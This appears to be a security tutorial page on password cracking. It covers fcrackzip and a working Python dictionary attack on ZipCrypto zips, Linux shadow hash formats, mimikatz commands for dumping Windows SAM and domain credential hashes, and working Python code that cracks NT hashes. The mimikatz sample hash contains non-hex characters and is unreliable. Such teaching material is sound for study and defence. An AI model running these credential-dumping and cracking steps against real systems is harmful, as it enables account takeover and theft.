Particle42
Password Cracking

Cracking Zipped Files

fcrackzip is a fast password cracker, partly written in assembler, for zip archives protected with the traditional PKZIP ("ZipCrypto") scheme. It runs brute-force or dictionary attacks and can optionally verify each hit by calling unzip, which matters because the quick check it performs on its own lets false positives through. It can also crack cpmask'ed images. Two caveats: it does not handle AES-encrypted zips (WinZip or 7-Zip AES), and for anything beyond a small wordlist it is faster to convert the archive with zip2john and run hashcat or john against the result.
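The dictionary attack described above, as an added example in Python rather than an fcrackzip invocation (this is not code from the original page or from fcrackzip). It re-implements the traditional PKZIP key schedule only so that a test archive can be built in memory with a hypothetical password, file name and wordlist; the cracking loop then does what fcrackzip's dictionary mode does, with Python's zipfile module acting as the verifier that `-u` delegates to unzip.

```python
"""Dictionary attack on a zip protected with traditional PKZIP (ZipCrypto) encryption.

Added example, not from the original page. It does in Python what
`fcrackzip -u -D -p wordlist.txt archive.zip` does, building the target
archive in memory (hypothetical password) so that it runs offline.
"""
import io
import os
import struct
import zipfile
import zlib


def _crc_table():
    # Same polynomial as zlib, used without the usual pre/post inversion.
    table = []
    for i in range(256):
        c = i
        for _ in range(8):
            c = (c >> 1) ^ 0xEDB88320 if c & 1 else c >> 1
        table.append(c)
    return table


_CRC = _crc_table()


class ZipCrypto:
    """PKWARE traditional encryption: three 32-bit keys seeded from the password."""

    def __init__(self, pwd: bytes):
        self.k = [0x12345678, 0x23456789, 0x34567890]
        for b in pwd:
            self._update(b)

    def _update(self, b: int) -> None:
        k = self.k
        k[0] = _CRC[(k[0] ^ b) & 0xFF] ^ (k[0] >> 8)
        k[1] = (k[1] + (k[0] & 0xFF)) & 0xFFFFFFFF
        k[1] = (k[1] * 134775813 + 1) & 0xFFFFFFFF
        k[2] = _CRC[(k[2] ^ (k[1] >> 24)) & 0xFF] ^ (k[2] >> 8)

    def encrypt(self, data: bytes) -> bytes:
        out = bytearray()
        for b in data:
            t = (self.k[2] | 2) & 0xFFFF
            out.append(b ^ (((t * (t ^ 1)) >> 8) & 0xFF))
            self._update(b)  # keystream advances on the plaintext byte
        return bytes(out)


def make_encrypted_zip(name: bytes, data: bytes, pwd: bytes) -> bytes:
    """Minimal single-entry zip (stored, not deflated) with a ZipCrypto-encrypted entry."""
    crc = zlib.crc32(data) & 0xFFFFFFFF
    # 12-byte encryption header: 11 random bytes plus the high byte of the CRC.
    # Decryptors test that last byte first, so a wrong password is rejected
    # 255 times out of 256 before any data is read; the remaining 1/256 are the
    # false positives that fcrackzip's -u option filters by calling unzip.
    header = os.urandom(11) + bytes([crc >> 24])
    body = ZipCrypto(pwd).encrypt(header + data)
    flags, method, mtime, mdate = 1, 0, 0, 0x21  # bit 0 = encrypted; stored; 1980-01-01
    local = struct.pack("<4sHHHHHIIIHH", b"PK\x03\x04", 20, flags, method, mtime, mdate,
                        crc, len(body), len(data), len(name), 0) + name + body
    central = struct.pack("<4sHHHHHHIIIHHHHHII", b"PK\x01\x02", 20, 20, flags, method,
                          mtime, mdate, crc, len(body), len(data), len(name),
                          0, 0, 0, 0, 0, 0) + name
    eocd = struct.pack("<4sHHHHIIH", b"PK\x05\x06", 0, 0, 1, 1, len(central), len(local), 0)
    return local + central + eocd


def crack_zip(archive: bytes, wordlist):
    """Return the first candidate that passes the check byte and yields a good CRC."""
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        name = zf.namelist()[0]
        for candidate in wordlist:
            try:
                zf.read(name, pwd=candidate.encode())
                return candidate  # CRC of the decrypted data matched
            except RuntimeError:
                continue  # check byte mismatch: the common case
            except zipfile.BadZipFile:
                continue  # passed the check byte but CRC failed: a false positive
    return None


# Constructed sample: hypothetical secret, password and wordlist.
SECRET = b"flag{constructed sample}\n"
ARCHIVE = make_encrypted_zip(b"notes.txt", SECRET, b"sunshine1")
WORDLIST = ["123456", "password", "qwerty", "letmein", "sunshine1", "dragon"]

if __name__ == "__main__":
    print("password:", crack_zip(ARCHIVE, WORDLIST))
```

The check byte is what makes ZipCrypto cheap to attack: nearly every wrong guess is thrown out after twelve bytes of keystream, and it is also why fcrackzip without `-u` prints candidates that turn out to be wrong. ZipCrypto is additionally broken outright when about a dozen bytes of plaintext are known (bkcrack recovers the internal keys with no guessing at all), and AES-encrypted zips are a different format entirely; use zip2john with hashcat or john for those.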

Password Hashes

Hashes are one-way mathematical functions that map an input of any length to a fixed-size output, the size depending on the algorithm. A good password hash is hard to invert and hard to find collisions for, which is what makes it the right thing to store instead of the password: the application keeps only the hash, and at login it hashes whatever the user submitted and compares the result with the stored value. The plaintext should travel to the server over an encrypted channel (TLS) and be hashed there with a unique salt and a deliberately slow algorithm (bcrypt, scrypt, Argon2, or the yescrypt and sha512crypt schemes Linux uses). Hashing in the browser and submitting the hash instead does not help; if the server compares that hash directly against its database, the hash is the password for all practical purposes, and anyone who obtains it can replay it.

The attacks on this scenario follow from that: read the password where it exists in cleartext (for example with JavaScript on a page you control), use a captured hash directly in place of the password (pass-the-hash, which is exactly what works against NTLM), or crack the hash by trial and error. This page covers the last method.

To crack a hash you first identify its type, since many algorithms and combinations of them produce hashes that look alike, and then compute that same hash over a list of candidate passwords until one matches. Salts are not secret; they only stop you reusing one computation across many users, so each salted hash has to be attacked on its own, while unsalted hashes (NT hashes, plain MD5) can be attacked all at once.

Where can I find the hashes?

Linux

On Linux the password hash lives in /etc/shadow, which is readable only by root; /etc/passwd is world-readable but holds only an "x" in the password field on any system of the last two decades. A simple cat of the file reveals the hash once you have root, or when a misconfiguration (a world-readable shadow, a backup copy left in /var/backups, an exposed filesystem image) gives you read access. Here's a sample,

cracker:$y$j9T$ZK0bEZsSNBGw1Yv/kWge61$fp9tNqPvlPPksXAfy0zVlSTo0gfUWrX7rOZrHvqHvD.:19278:0:99999:7:::

The fields are colon separated: username, hash, date of last change (days since 1970-01-01), minimum age, maximum age, warning period, inactivity period, expiry date and a reserved field. The hash itself is in modular crypt format, $id$salt$hash, and the id tells you the algorithm: $1$ is md5crypt, $5$ sha256crypt, $6$ sha512crypt, $2b$ bcrypt and $y$ yescrypt, the default on current Debian and Ubuntu. The hash section can be taken out of this line and fed into the hashid command to identify the type of hash algorithm used,

hashid '$6$T6lcJJcLaIi3KQ8k$SzDYMo2863hQQUz8o33O6.FzIx9QvjHz9Qrk/68PYKwNS3vHdcmWNeRhyegCv96QNYG5aAqUnK/zeP9cm2eqS/'

hashid predates yescrypt and may not recognise the $y$ prefix, so go by the prefix in that case. When you have both files, john's unshadow utility merges passwd and shadow into the format john expects, which also lets it report which user each cracked password belongs to.

Windows

It is slightly trickier on Windows. Local account hashes are stored in the SAM registry hive, encrypted with a key derived from the SYSTEM hive; domain account hashes live in NTDS.dit on the domain controllers when Active Directory is in use; and the credentials of recently logged-on users are also cached in LSASS memory. We will use mimikatz.exe to retrieve password hashes. It is not part of Windows and has to be brought onto the target, where most AV/EDR products will flag it on sight.

The tool has to be launched from a command prompt with administrative rights.

mimikatz.exe

Once the mimikatz prompt appears, enter the following commands:

privilege::debug
token::elevate
lsadump::sam

privilege::debug enables SeDebugPrivilege, token::elevate impersonates the SYSTEM token so that the protected SAM and SYSTEM hives can be read, and lsadump::sam decrypts and dumps the local accounts with their hashes, as shown below. (Domain accounts are a separate job: lsadump::dcsync against a domain controller, or sekurlsa::logonpasswords for whatever is still in LSASS memory.) mimikatz labels the value "NTLM", but it is the NT hash, the MD4 of the UTF-16LE password: 32 hex digits, unsalted, so two users with the same password have the same hash, and usable directly with pass-the-hash without cracking it at all. For cracking, this is hashcat mode 1000 or john's NT format.

User : victim
  Hash NTLM: 2892z26cdf84d9a70e2eb3y9f05c425e
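The identification step from the Linux section and the trial-and-error step against an NT hash like the one mimikatz prints, as one added example (not code from the original page, mimikatz or hashid). It classifies a shadow entry by its modular-crypt prefix, and implements MD4 itself so NT hashes can be computed on OpenSSL 3 builds where hashlib refuses md4 without the legacy provider. The shadow line is the sample shown above; the victim's NT hash, the wordlist and the hashcat mode table are constructed for this example, and the hash is the NT hash of a made-up password rather than the value mimikatz printed above.

```python
"""Identify a Linux shadow hash, then dictionary-attack a Windows NT hash.

Added example, not from the original page. The shadow line is the one shown
earlier on the page; the NT hash and wordlist are constructed.
"""
import struct
from typing import Optional

# Modular-crypt prefix -> (algorithm, hashcat -m mode). Prefix ids are from crypt(5).
CRYPT_PREFIXES = {
    "$1$": ("md5crypt", 500),
    "$2a$": ("bcrypt", 3200), "$2b$": ("bcrypt", 3200), "$2y$": ("bcrypt", 3200),
    "$5$": ("sha256crypt", 7400),
    "$6$": ("sha512crypt", 1800),
    "$y$": ("yescrypt", None),  # current Debian/Ubuntu default; hashcat has no mode for it
}


def parse_shadow(line: str) -> dict:
    """Split one shadow(5) entry and classify its password field by prefix."""
    fields = line.rstrip("\n").split(":")
    if len(fields) != 9:
        raise ValueError("not a shadow entry: expected 9 colon-separated fields")
    user, pw = fields[0], fields[1]
    if pw in ("", "*", "!!") or pw.startswith("!"):
        # locked, disabled or passwordless account: nothing to crack
        return {"user": user, "algorithm": "locked/none", "hashcat_mode": None, "hash": pw}
    if not pw.startswith("$"):
        # 13-character traditional DES crypt, seen on very old systems
        return {"user": user, "algorithm": "descrypt", "hashcat_mode": 1500, "hash": pw}
    prefix = "$" + pw.split("$")[1] + "$"
    algorithm, mode = CRYPT_PREFIXES.get(prefix, ("unknown", None))
    return {"user": user, "algorithm": algorithm, "hashcat_mode": mode, "hash": pw}


def md4(data: bytes) -> bytes:
    """MD4 per RFC 1320; hashlib.new("md4") is unavailable on many OpenSSL 3 builds."""
    mask = 0xFFFFFFFF

    def rotl(x: int, n: int) -> int:
        return ((x << n) | (x >> (32 - n))) & mask

    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)

    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(48):
            j = i % 16
            if i < 16:    # round 1: F, message words in order
                f, k, s, add = (b & c) | (~b & d), j, (3, 7, 11, 19)[j % 4], 0
            elif i < 32:  # round 2: G, words 0,4,8,12,1,5,9,13,...
                f = (b & c) | (b & d) | (c & d)
                k, s, add = (j % 4) * 4 + j // 4, (3, 5, 9, 13)[j % 4], 0x5A827999
            else:         # round 3: H, words 0,8,4,12,2,10,6,14,...
                f = b ^ c ^ d
                k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[j]
                s, add = (3, 9, 11, 15)[j % 4], 0x6ED9EBA1
            a = rotl((a + f + x[k] + add) & mask, s)
            a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & mask, (b + bb) & mask, (c + cc) & mask, (d + dd) & mask
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> str:
    """NT hash as mimikatz prints it: MD4 over the UTF-16LE password, no salt."""
    return md4(password.encode("utf-16le")).hex()


def crack_nt_hash(target_hex: str, wordlist) -> Optional[str]:
    """Unsalted, so it is one MD4 per candidate and the work is shared across users."""
    target = target_hex.lower()
    for candidate in wordlist:
        if nt_hash(candidate) == target:
            return candidate
    return None


SHADOW_LINE = ("cracker:$y$j9T$ZK0bEZsSNBGw1Yv/kWge61$"
               "fp9tNqPvlPPksXAfy0zVlSTo0gfUWrX7rOZrHvqHvD.:19278:0:99999:7:::")
VICTIM_NT_HASH = "8846f7eaee8fb117ad06bdd830b7586c"  # constructed: NT hash of "password"
WORDLIST = ["123456", "qwerty", "Welcome1", "password", "letmein"]

if __name__ == "__main__":
    print(parse_shadow(SHADOW_LINE))
    print("victim:", crack_nt_hash(VICTIM_NT_HASH, WORDLIST))
```

For the Linux hashes the same loop needs the slow salted function (md5crypt, sha512crypt, yescrypt) in place of md4, which is where hashcat and john earn their keep; the prefix and mode returned by parse_shadow are what you hand to them.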

Last updated 6 months ago
